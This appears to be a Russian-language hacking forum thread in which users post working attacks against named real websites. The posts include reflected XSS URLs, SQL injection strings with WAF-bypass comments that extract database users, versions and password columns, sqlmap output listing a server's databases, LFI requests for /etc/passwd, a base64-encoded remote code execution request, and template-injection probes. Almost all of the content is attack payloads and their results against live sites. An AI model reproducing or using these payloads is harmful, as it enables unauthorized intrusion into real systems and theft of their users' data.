Code: https://www.edmunds.com/a/?":""});alert(document.cookie);// http://oregonstate.edu/training/course_search.php?subject="><script>alert(999)</script> https://lyricstranslate.com/?page="><script>alert(7889789)</script> http://720pizle.com/ara.asp?a="><script>alert(7889789)</script> http://epinions.com/search/books/63715?"><script>alert(6456456)</script> https://mgronline.com/south/1232/search?searchTxt="><script>alert(045839)</script> http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto="><script>alert(4389)</script> http://www3.gogoanime.tv/"><script>alert(4389)</script> https://bursadabugun.com/ruya-tabirleri/?q[keyword]="><script>alert(4389)</script> https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=</title><script>alert(4389)</script> https://warframe.market/</script><script>alert(4389)</script> https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87/?Line="><script>alert(4389)</script> http://www.gazetevatan.com/Default.aspx?aType=';alert();// http://thebitcoincode.com/video.php?poster="><script>alert(4389)</script> https://gamebanana.com/tools?"><script>alert(4389)</script> https://indosport.com/"><script>alert(4389)</script> http://brasilescola.uol.com.br/"><script>alert(4389)</script> https://watchasian.co/"><script>alert(4389)</script> https://mgronline.com/south/1232/search?searchTxt="><script>alert(4389)</script> http://portail.free.fr/services/pagesjaunes/bons-plans.php?where="><script>alert(4389)</script> http://minnstate.edu/jobs/searchResults.php?"><script>alert(4389)</script> https://eadaily.com/"><script>alert(00088)</script> http://projectfreetv.bz/hd/project.php?title=<script>alert(4389)</script> http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version="><script>alert(4389)</script>
Code: http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(tione_igs.applications)where(0x00)in(@x:=concat(@x,0x3c62723e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1
Code: http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW Spoiler: from sqlmap Parameter: #1* (URI) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK Vector: AND MAKE_SET([INFERENCE],[RANDNUM]) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)# Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) Spoiler: bd available databases [110]: [*] 1poverennaya.ru [*] 3dschool.akadem-art.ru [*] acmoda_fashion [*] akadem-art.ru [*] amsterdam.ru [*] amur-tiger [*] api.olit.su [*] apteki.ru [*] at [*] ayashiclimat [*] berendeevo [*] bitrix_55 [*] cargoflies.ru [*] civlife [*] cookies [*] cpa [*] cpa-monsters.ru [*] crypto [*] cv79250_db [*] db1050525_rpfm [*] dev.check-car.io [*] dish.ru [*] docdoc [*] dojoy.ru [*] dreamwood [*] el-torg.ru [*] fefectu_fikcii [*] game4art.ru [*] gidrolica [*] greencontinent.bio [*] hockeyfamily [*] hostel [*] information_schema [*] informed [*] irasmarovoz [*] kordik-psyhelp [*] kz_health [*] lecture [*] led1080.ru [*] lesspas [*] light [*] lotmo [*] mailer [*] maxphoto [*] medelement.ru [*] messenger [*] metalnastil.ru [*] miel.ru [*] modelery [*] mototelega [*] mysql [*] nanokeratin-shop [*] new.olit.su [*] new_olit [*] newoleg [*] olit_su [*] olmatveeva.ru [*] pdns [*] performance_schema [*] photoluxor [*] picture [*] pineapple [*] powerdns [*] prazdnik [*] pressnastil.ru [*] profdoctors.ru [*] push [*] radio.ru [*] recraft.ru-yii [*] redmine [*] rekomendacii [*] remcraft.ru [*] remcraft.ru-new [*] remcraft.ru-new1!! [*] resthistory [*] rlogistika [*] seobirds [*] seorakerus [*] seowant.ru [*] sflegaladvice [*] siluet.su [*] sitemanager0 [*] skld [*] social [*] sound_olit [*] sound_olit_su [*] sport [*] spz-rus.ru [*] stroynastil.ru [*] stroynastil.ru1 [*] sveng [*] telegramm [*] test [*] umgear.ru [*] union.ru [*] union.ru-old [*] vault-pdm.ru [*] velespro.com [*] videoportal [*] visagestyle [*] water-check.ru [*] wawtalk.io [*] webmonsters [*] whoknow.ru [*] yandex_bot [*] yiilab [*] ymga.ru [*] ymga.ru-new [*] zabbix [*] zaem-info.ru
Здравствуйте) На форуме первый день, попробую тоже. 1. SQL-инъекция с обходом WAF Code: GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1 Host: www.cdlmacapa.com.br User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 2. SQL-инъекция с выводом в ошибке Code: http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()+limit+0,1)))
Еще немножко - теперь LFI. Code: http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774 https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&[email protected]``` http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd
Code: https://www.bible-history.com/subcat.php?id=-1%20union%20all%20select%20user()%20--%20 rusty@localhost 5.5.62 bible_history
XSS 1) https://elkomp.ru/search?sought=<script>alert('xss')</script> 2) https://kubnews.ru/poisk/?q=<script>alert('xss')</script> 3) http://ivgoradm.ru/find=<script>alert('xss')</script> 4) https://www.lapsi.ru/list.php?q=<script>alert('xss')</script> 5) http://brykury.com.ua/products/search?search=<script>alert('xss')</script>
SQLi: SoftwareOnRent Code: http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,concat_ws(0x7c,database(),%20user(),version()),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+&catid=1&compid=135 SOR|SORuser@localhost|5.5.56-MariaDB Code: http://softwareonrent.com/product.php?id=45%27%20union%20select%201,2,3,4,5,6,group_concat(column_name),8,9,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27--+&catid=1&compid=135 SecurityDealOnline Code: http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20concat_ws(0x7c,database(),version()))))--+ bluewings|bluewings1@localhost|5.6.39-cll-lve Code: http://securitydealonline.com/list.php?id=-19%20and%20extractvalue(0x0a,concat(0x0a,(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20)))--+ BrandTagz Code: http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,concat_ws(%27|%27,%20database(),user(),version()),3,4,5,6,7,8,9,10,11--+&&product=Dress%20Shirts [brandtag|brandtag@localhost|5.6.39-cll-lve] Code: http://www.brandtagz.com/products.php?category=-men%27%20union%20select%201,%20group_concat(concat_ws(':',email, password),0x0a),3,4,5,6,7,8,9,10,11%20from user--+&&product=Dress%20Shirts
Rcadia Code: http://www.rcadia.com/page.php?pageID=-23%20union%20select%2012,3,4,5,concat_ws(0x7c,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19 [email protected]|rcadia2|5.6.34-log Городской совет, Черкассы Code: http://chmr.gov.ua/myrada/html/195784.php?id=-195784%20/*!50000uNioN*/%20select%20concat_ws(0x7c, database(),user(),version())--+ myrada|myrada@ns1|5.5.24-log Индусо шоп Code: https://www.royalenterprises.co.in/category.php?cid=9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+ myp13eyd_royal2|myp13eyd_royal2@localhost|5.6.32-78.1 Code: https://www.royalenterprises.co.in/category.php?cid=-9%27%20/*!50000uNiOn*/+/*!50000sElEcT*/+%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18 from /*!50000infoRmAtiOn_sChEma*/.tables+/*!50000WhErE*/+/*!50000table_schema*/=database()--+#
way.com Code: https://shuttle.way.com/waypanel/drivers/track-drivers-by-parking.php?pid=844 Parameter: pid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=844' AND 3141=3141 AND 'gxfZ'='gxfZ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: pid=844' AND SLEEP(5) AND 'tJKn'='tJKn --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 Code: http://www.alicetinting.com.au/pop.php?ID=37 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178766271,(SELECT (ELT(8597=8597,1))),0x716a707171,0x78))s), 8446744073709551610, 8446744073709551610)))
rce (= Spoiler: oops шттп://www.t| u | torialspoint.com/ Stat on similarweb =) PoC Spoiler: query with params Code: from base64 UE9TVCBodHRwczovL3RwY2cudHV0b3JpYWxzcG9pbnQuY29tL3RwY2cucGhwIEhUVFAvMS4xCkNvbnRlbnQtTGVuZ3RoOiA3MgpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZApIb3N0OiB0cGNnLnR1dG9yaWFsc3BvaW50LmNvbQoKbGFuZz1zaCZkZXZpY2U9JmNvZGU9LewmZXh0PXNoJmNvbXBpbGU9MCZleGVjdXRlPWVudiZtYWluZmlsZT1leGVjJnVpZD0x
ZoneAlarm Code: https://forums.zonealarm.com/ajax/render/widget_php POST: widgetConfig[code]=phpinfo();
Blind XSS в админке Hostinger, простите за ру сайт https://crm.hostinger.io/client/29640132 PS: Зарепортил сказали спасибо и продлили хостинг на один месяц
Есть такой кардер который украл 36 милионов $ и отсидел 10 лет, сейчас у него канал на ютубе "Люди PRO", сам смотрю ) У него свой кэшбэк сервис в котором минут за 5 нашел Server side template injection, правда полезную нагрузку вывесть не смог ( https://secretdiscounter.com/ru/search/coupon?limit=30&query={{7*7}}. + XSS https://secretdiscounter.com/ru/"//><script>alert(5)</script>
General Inspectorate for Emergency Situations Генеральная инспекция для чрезвычайных ситуаций Code: https://www.igsu.ro/index.php?pagina=materiale_preventive%3E%3Cscript%3Ealert(666)%3C/script%3E
Promotora Española de Lingüística (Proel) Code: http://www.proel.org/index.php?sw=%3E%3Cscript%3Ealert%285%29%3C%2Fscript%3E&pagina=searchresult